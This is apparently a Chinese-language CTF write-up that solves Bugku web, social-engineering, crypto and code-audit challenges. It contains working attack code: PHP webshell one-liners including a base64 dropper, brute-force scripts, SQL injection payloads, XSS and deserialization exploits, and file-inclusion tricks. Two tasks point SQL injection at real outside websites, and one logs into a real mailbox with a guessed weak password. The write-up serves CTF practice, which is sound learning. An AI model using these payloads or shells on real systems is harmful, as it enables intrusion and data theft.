| 网站已经浑身是马了,随意找一个
//view-source:http://120.24.86.145:8001/html/special/test000/
<?php file_put_contents('tiny.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3Bhc3NdKTs/Pg==')); ?>
//<?php @eval($_POST[pass]);?>
菜刀连上后拿到一张[flag.jpg](http://120.24.86.145:8001/flag.jpg),
图片末尾隐藏有字符串 flag{admin_a23-ae2132_key}
|
海洋CMS#
地址:http://120.24.86.145:8008/
flag在根目录某个txt里
扫到flag.php,flag{felege-ctf-2017_04}。
输入密码查看flag#
http://120.24.86.145:8002/baopo/
作者:Se7en
直说爆破了,用burp的intruder,Payload Position选pwd=§1§§1§§1§§1§§1§ ,Attack Type选Cluster bomb,payload option选数字,共十万种可能,慢慢等。也可以写个小脚本跑跑。最后密码是13579。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| #coding:utf8
import requests,itertools,string
u="http://120.24.86.145:8002/baopo/"
d=string.digits
req=requests.session()
cnt=0
for i in itertools.product(d,d,d,d,d):
data={"pwd":''.join(i)}
r=req.post(u,data=data)
cnt=cnt+1
if "密码不正确" not in r.content:
print "correct,",data
if cnt%1000==0:
print cnt
|
flag{bugku-baopo-hah}
前女友#
http://47.93.190.246:49162/
flag格式:SKCTF{xxxxxxxxxxxxxxxxxx}
1
2
3
4
5
6
7
8
9
10
11
12
13
| //http://47.93.190.246:49162/code.txt
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
if($v1 != $v2 && md5($v1) == md5($v2)){
if(!strcmp($v3, $flag)){
echo $flag;
}
}
}
?>
|
http://47.93.190.246:49162/?v1[]=&v2[]=1&v3[]=
向md5()或strcmp()传入数组会返回null,null为假。
SKCTF{Php_1s_tH3_B3St_L4NgUag3}
点击一百万次#
http://120.24.86.145:9001/test/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| <script>
var clicks=0
$(function() {
$("#cookie")
.mousedown(function() {
$(this).width('350px').height('350px');
})
.mouseup(function() {
$(this).width('375px').height('375px');
clicks++;
$("#clickcount").text(clicks);
if(clicks >= 1000000){
var form = $('<form action="" method="post">' +
'<input type="text" name="clicks" value="' + clicks + '" hidden/>' +
'</form>');
$('body').append(form);
form.submit();
}
});
});
</script>
|
JavaScript代码表示当clicks大于1M时post一个数据包,所以直接post clicks=1000001 得到flag{Not_C00kI3Cl1ck3r} 。
备份是个好习惯#
http://120.24.86.145:8002/web16/
听说备份是个好习惯
扫到index.php.bak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| <?php
/**
* Created by PhpStorm.
* User: Norse
* Date: 2017/8/6
* Time: 20:22
*/
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>
|
访问http://120.24.86.145:8002/web16/?kkeyey1[]&kkeyey2[]=1 得到Bugku{OH_YOU_FIND_MY_MOMY}
成绩单#
快来查查成绩吧
http://120.24.86.145:8002/chengjidan/
简单的sql注入
1
2
3
4
5
6
7
8
9
10
| url:http://120.24.86.145:8002/chengjidan/index.php
post:
id=2' and 1=0 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
//fl4g,sc
id=2' and 1=0 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666c3467#
//skctf_flag
id=2' and 1=0 union select 1,2,3,skctf_flag from fl4g#
//BUGKU{Sql_INJECT0N_4813drd8hz4}
|
秋名山老司机#
http://120.24.86.145:8002/qiumingshan/
1
2
3
4
5
6
| import requests,re
u="http://120.24.86.145:8002/qiumingshan/"
r=requests.session()
res=eval(re.findall("<div>(.*)=",r.get(u).content)[0])
print r.post(u,data={"value":str(res)}).content
# 原来你也是老司机 Bugku{YOU_DID_IT_BY_SECOND}
|
速度要快#
速度要快!!!!!!
http://120.24.86.145:8002/web6/
格式KEY{xxxxxxxxxxxxxx}
1
2
3
4
5
| 抓包发现响应头有额外键值对
flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT1RjeU5EYzQ=
值解码后为 跑的还不错,给你flag吧: NjE0NzY4
响应包内容如下
</br>我感觉你得快点!!!<!-- OK ,now you have to post the margin what you find -->
|
要留意保持session。
1
2
3
4
5
6
7
8
| import requests
import base64
url = 'http://120.24.86.145:8002/web6/'
ses=requests.session()
r = ses.get(url)
key = base64.b64decode(base64.b64decode(r.headers['flag']).split(' ')[1])
print ses.post(url, data={'margin': key}).content
#KEY{111dd62fcd377076be18a}
|
cookie欺骗#
http://120.24.86.145:8002/web11/
答案格式:KEY{xxxxxxxx}
重定向至http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ= ,发现可读源码。
1
2
3
4
| import requests
for i in xrange(30):
url='http://120.24.86.145:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw'%i
print requests.get(url).content.strip()
|
读到index.php 如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| <?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
|
进一步读取keys.php
1
2
3
4
| import requests,base64
for i in xrange(30):
url='http://120.24.86.145:8002/web11/index.php?line=%d&filename=%s'%(i,base64.b64encode('keys.php'))
print requests.get(url,headers={'cookie':'margin=margin'}).content.strip()
|
读到keys.php 内容如下:
1
| <?php $key='KEY{key_keys}'; ?>
|
XSS#
http://103.238.227.13:10089/
Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| 关键代码:
<body>
<div class="container">
<h2>XSS注入测试</h2>
<div class="alert alert-success">
<p>1、请注入一段XSS代码,获取Flag值</p>
<p>2、必须包含alert(_key_),_key_会自动被替换</p>
</div>
<div id="s"></div>
</div>
<script>var s=""; document.getElementById('s').innerHTML = s;</script>
</body>
============================================================
利用Unicode编码绕过
url: http://103.238.227.13:10089/?id=\u003c_key_\u003e
Flag: 17f094325e90085b30a5ddefce34acd8
|
never give up#
http://120.24.86.145:8006/test/hello.php
作者:御结冰城
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| 直接访问120.24.86.145:8006/test/1p.html会被重定向
访问view-source:http://120.24.86.145:8006/test/1p.html得到
var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E" ;
print unescape(Words) //on chrome console
//<script>window.location.href='http://www.bugku.com';</script>
<!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->
print unescape(atob('JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ=='))
-------------------------------------------
if(!$_GET['id']){
header('Location: hello.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.')){
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4){
require("f4l2a3g.txt");
}
else{
print "never never never give up !!!";
}
?>
|
1
2
3
| http://120.24.86.145:8006/test/f4l2a3g.txt
得到flag{tHis_iS_THe_fLaG}
或者a=php://input&id=0&b=%00findneo....。。???????
|
welcome to bugkuctf#
http://120.24.86.145:8006/test1/
作者:pupil
1
2
3
4
5
6
7
8
9
10
| $user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| //http://120.24.86.145:8006/test1/?file=php://filter/convert.base64-encode/resource=index.php&txt=php://input
//post welcome to the bugkuctf
//index.php
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "不能现在就给你flag哦";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->
-----------------------------------------------------------------------------------
//http://120.24.86.145:8006/test1/?file=php://filter/convert.base64-encode/resource=hint.php&txt=php://input
//post welcome to the bugkuctf
//hint.php
<?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>
|
考察PHP反序列化。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| <?php
class Flag{
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
$f=new Flag();
$f->file='flag.php';
var_dump(serialize($f));
//string(41) "O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}"
?>
-------------------------------------------------------------------------
访问
view-source:http://120.24.86.145:8006/test1/?file=hint.php&txt=php://input&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
同时post welcome to the bugkuctf
得到 flag{php_is_the_best_language}
|
login#
http://47.93.190.246:49163/
flag格式:SKCTF{xxxxxxxxxxxxxxxxx}
hint:SQL约束攻击
注册一个用户名为admin 1 ,密码随意的用户,然后用admin和该密码登陆。SKCTF{4Dm1n_HaV3_GreAt_p0w3R}
参考: http://www.freebuf.com/articles/web/124537.html
过狗一句话#
http://120.24.86.145:8010/
送给大家一个过狗一句话
1
| <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>
|
1
2
3
| view-source:http://120.24.86.145:8010/?s=var_dump(scandir('.'))
view-source:http://120.24.86.145:8010/?s=var_dump(file_get_contents('flag.txt'))
string(25) "BUGKU{bugku_web_009801_a}"
|
maccms - 苹果cms#
地址:http://120.24.86.145:8009/
appcms#
http://120.24.86.145:8012/
flag在根目录
小明的博客#
http://120.24.86.145:9003/
请勿破坏靶场
各种绕过哟#
各种绕过哟
http://120.24.86.145:8002/web7/
1
2
3
4
5
6
7
8
9
10
11
12
| <?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
if ($_GET['uname'] == $_POST['passwd'])
print 'passwd can not be uname.';
else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
die('Flag: '.$flag);
else
print 'sorry!';
} ?>
|
1
2
3
| http://120.24.86.145:8002/web7/?uname[]=&id=margin
post passwd[]=1
Flag: flag{HACK_45hhs_213sDD}
|
WEB8#
txt????
http://120.24.86.145:8002/web8/
1
2
3
4
5
6
7
8
9
10
11
12
| <?php
extract($_GET);
if (!empty($ac)){
$f = trim(file_get_contents($fn));
if ($ac === $f){
echo "<p>This is flag:" ." $flag</p>";
}
else{
echo "<p>sorry!</p>";
}
}
?>
|
1
2
3
| http://120.24.86.145:8002/web8/?ac=findneo&fn=php://input
post findneo
This is flag: flag{3cfb7a90fc0de31}
|
字符?正则?#
字符?正则?
http://120.24.86.145:8002/web10/
1
2
3
4
5
6
7
8
| <?php
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){
die('key is: '.$key);
}
?>
|
1
2
| http://120.24.86.145:8002/web10/?id=keykeyxxxxkey:/x/keyp[:punct:]
key is: KEY{0x0SIOPh550afc}
|
考细心#
地址:http://120.24.86.145:8002/web13/
想办法变成admin
扫描到 robots.txt,发现/resusl.php 页面响应中有if ($_GET[x]==$password) foo 。
访问/web13/resusl.php?x=admin 得到flag(ctf_0098_lkji-s) 。
代码审计#
http://120.24.86.145:8002/web14/
数据库没弄好 先别做这个题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
| <?php
include "config.php";
class HITCON{
private $method;
private $args;
private $conn;
public function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
$this->__conn();
}
function show() {
list($username) = func_get_args();
$sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);
$obj = $this->__query($sql);
if ( $obj != false ) {
$this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
} else {
$this->__die("Nobody Nobody But You!");
}
}
function login() {
global $FLAG;
list($username, $password) = func_get_args();
$username = strtolower(trim(mysql_escape_string($username)));
$password = strtolower(trim(mysql_escape_string($password)));
$sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);
if ( $username == 'orange' || stripos($sql, 'orange') != false ) {
$this->__die("Orange is so shy. He do not want to see you.");
}
$obj = $this->__query($sql);
if ( $obj != false && $obj->role == 'admin' ) {
$this->__die("Hi, Orange! Here is your flag: " . $FLAG);
} else {
$this->__die("Admin only!");
}
}
function source() {
highlight_file(__FILE__);
}
function __conn() {
global $db_host, $db_name, $db_user, $db_pass, $DEBUG;
if (!$this->conn)
$this->conn = mysql_connect($db_host, $db_user, $db_pass);
mysql_select_db($db_name, $this->conn);
if ($DEBUG) {
$sql = "CREATE TABLE IF NOT EXISTS users (
username VARCHAR(64),
password VARCHAR(64),
role VARCHAR(64)
) CHARACTER SET utf8";
$this->__query($sql, $back=false);
$sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";
$this->__query($sql, $back=false);
}
mysql_query("SET names utf8");
mysql_query("SET sql_mode = 'strict_all_tables'");
}
function __query($sql, $back=true) {
$result = @mysql_query($sql);
if ($back) {
return @mysql_fetch_object($result);
}
}
function __die($msg) {
$this->__close();
header("Content-Type: application/json");
die( json_encode( array("msg"=> $msg) ) );
}
function __close() {
mysql_close($this->conn);
}
function __destruct() {
$this->__conn();
if (in_array($this->method, array("show", "login", "source"))) {
@call_user_func_array(array($this, $this->method), $this->args);
} else {
$this->__die("What do you do?");
}
$this->__close();
}
function __wakeup() {
foreach($this->args as $k => $v) {
$this->args[$k] = strtolower(trim(mysql_escape_string($v)));
}
}
}
if(isset($_GET["data"])) {
@unserialize($_GET["data"]);
} else {
new HITCON("source", array());
}
|
求getshell#
求getshell
http://120.24.86.145:8002/web9/
flag.php#
地址:http://120.24.86.145:8002/flagphp/
点了login咋没反应
提示:hint
根据提示访问http://120.24.86.145:8002/flagphp/?hint=1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| <?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY") {
echo "$flag";
}
else {
?>
<html>foo </html>
<?php
}
$KEY='ISecer:www.isecer.com';
?>
|
本以为请求头cookie添加键值对ISecer:s:21:"ISecer:www.isecer.com"; 即可。但这里很有趣,因为此处$KEY值仍为空,所以添加的键值对是ISecer:s:0:""; 。flag{unserialize_by_virink}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| <?php
var_dump($foo);
$foo='foo';
var_dump($foo);
var_dump($bar);
?>
<?php
$bar='bar';
var_dump($bar);
---------------运行结果如下----------
Notice: Undefined variable: foo in C:\Users\*\Desktop\tets.php on line 2
NULL
string(3) "foo"
Notice: Undefined variable: bar in C:\Users\*\Desktop\tets.php on line 5
NULL
string(3) "bar"
PHP Notice: Undefined variable: foo in C:\Users\*\Desktop\tets.php on line 2
PHP Notice: Undefined variable: bar in C:\Users\*\Desktop\tets.php on line 5
|
INSERT INTO注入#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| 地址:http://120.24.86.145:8002/web15/
flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
|
文件包含2#
http://47.93.190.246:49166/
flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:文件包含
重定向到/index.php?file=hello.php ,响应头提示include.php ,注释提示upload.php 。
1
2
3
4
5
6
7
8
9
| 403
http://47.93.190.246:49166/admin.phps
http://47.93.190.246:49166/index.phps
http://47.93.190.246:49166/login.phps
http://47.93.190.246:49166/.htaccess
301
http://47.93.190.246:49166/upload
200
http://47.93.190.246:49166/upload.php
|
实战2-注入#
http://www.kabelindo.co.id
flag格式 flag{数据库最后一个表名字}
这是一个神奇的登陆框#
http://120.24.86.145:9001/sql/
flag格式flag{}
http://120.24.86.145:9004
本题有2个flag
flag格式 flag{}
1
2
3
4
5
6
7
8
9
10
11
12
| http://120.24.86.145:9004/1ndex.php?id=5%27||ascii(mid(database(),1,1))=ascii(%27w%27)--+
GET /1ndex.php?id=5%27||ascii(mid(database(),1,1))=119--+
''.join(map(chr,[119,101,98,49,48,48,50,45,49]))
'web1002-1'
http://120.24.86.145:9004/1ndex.php?id=5%27||ascii(mid(database(),1,1))%3E0--+
bingo="There is nothing"
ohno="You can do some SQL injection in here"
http://120.24.86.145:9004/1ndex.php?id=1%27||if(ascii(mid(select%20%22asdf%22,1,1))%3E0,sleep(10),0)--+
|
SQL注入2#
http://120.24.86.145:8007/web2/
全都tm过滤了绝望吗?
提示 !,!=,=,+,-,^,%
wordpress#
http://wp.bugku.com/
出题花了10分钟,应该很简单的,
进网站看看就明白了。
需要用到渗透测试第一步信息收集
login2#
http://47.93.190.246:49165/
SKCTF{xxxxxxxxxxxxxxxxxxxxx}
hint:union,命令执行
来源:山科大
login3#
http://47.93.190.246:49167/
flag格式:SKCTF{xxxxxxxxxxxxx}
hint:基于布尔的SQL盲注
来源:山科大
报错注入#
http://103.238.227.13:10088/
FLAG格式 Flag:””
实战1-注入#
http://www.interplay.com
flag格式 flag{数据库的第一个表名}
Trim的日记本#
http://120.24.86.145:9002/
hint:不要一次就放弃
login4#
http://47.93.190.246:49168/
flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:CBC字节翻转攻击
来源:山科大
Social#
密码???#
姓名:张三
生日;19970315
KEY格式KEY{xxxxxxxxxx}
KEY{zs19970315}
信息查找???#
社会工程学基础题目 信息查找
听说bugku.cn 在今日头条上能找到??
提示:flag为群号码
格式KEY{xxxxxxxxxxx}
访问https://www.google.com/search?q=bugku.cn+site%3Atoutiao.com ,得到462713425
入门题目,社工帝?#
name:孤长离
提示:弱口令
搜索孤长离到一个贴吧,弱口令登陆邮箱bkctftest@163.com 得到KEY{sg1H78Si9C0s99Q} 。
简单的社工尝试#
这个狗就是我画的,而且当了头像
这题提示的其实很明显了
想想吧
谷歌识图到达https://github.com/bugku ,然后到https://weibo.com/bugku ,然后是http://c.bugku.com/13211.txt ,就得到flag{BUku_open_shgcx1} 。
Crypto#
滴答~滴#
-… -.- -.-. - ..-. – .. … -.-.
答案格式KEY{xxxxxxxxx}
key{bkctfmisc}
推荐这个小工具
聪明的小羊#
一只小羊翻过了2个栅栏
KYsd3js2E{a2jda}
KEY{sad23jjdsa2}
推荐这个小工具
Ook!解混淆
flag{ok-ctf-1234-admin}
这不是摩斯密码#
Brainfuck解混淆
flag{ok-c2tf-3389-admin}
+[]-#
Brainfuck解混淆
flag{bugku_jiami_23}
zip伪加密#
将第六字节改为00即可。flag{Adm1N-B2G-kU-SZIP}
代码审计#
md5()函数#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| http://120.24.86.145:9009/18.php
<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password'])
print 'Your password can not be your username.';
else if (md5($_GET['username']) === md5($_GET['password']))
die('Flag: '.$flag);
else
print 'Invalid password';
}
?>
|
http://120.24.86.145:9009/18.php?username[]=1&password[]=
Flag: flag{bugk1u-ad8-3dsa-2}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| http://120.24.86.145:9009/1.php
<?php
$flag='xxx';
extract($_GET);
if(isset($shiyan))
{
$content=trim(file_get_contents($flag));
if($shiyan==$content)
{
echo'flag{xxx}';
}
else
{
echo'Oh.no';
}
}
?>
|
strcmp比较字符串#
1
2
3
4
5
6
7
8
9
10
11
12
| http://120.24.86.145:9009/6.php
<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。
//比较两个字符串(区分大小写)
die('Flag: '.$flag);
else
print 'No';
}
?>
|
http://120.24.86.145:9009/6.php?a[]
Flag: flag{bugku_dmsj_912k}
urldecode二次编码绕过#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| http://120.24.86.145:9009/10.php
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("
not allowed!
");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "
Access granted!
";
echo "
flag
";
}
?>
|
http://120.24.86.145:9009/10.php?id=hackerD%254a
flag{bugku__daimasj-1t2}
数组返回NULL绕过#
1
2
3
4
5
6
7
8
9
10
11
12
| http://120.24.86.145:9009/19.php
<?php
$flag = "flag";
if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
echo 'You password must be alphanumeric';
else if (strpos ($_GET['password'], '--') !== FALSE)
die('Flag: ' . $flag);
else
echo 'Invalid password';
}
?>
|
http://120.24.86.145:9009/19.php?password=a%00--
flag{ctf-bugku-ad-2131212}
弱类型整数大小比较绕过#
1
2
3
4
5
6
| http://120.24.86.145:9009/22.php
$temp = $_GET['password'];
is_numeric($temp)?die("no numeric"):NULL;
if($temp>1336){
echo $flag;
|
http://120.24.86.145:9009/22.php?password=1337x
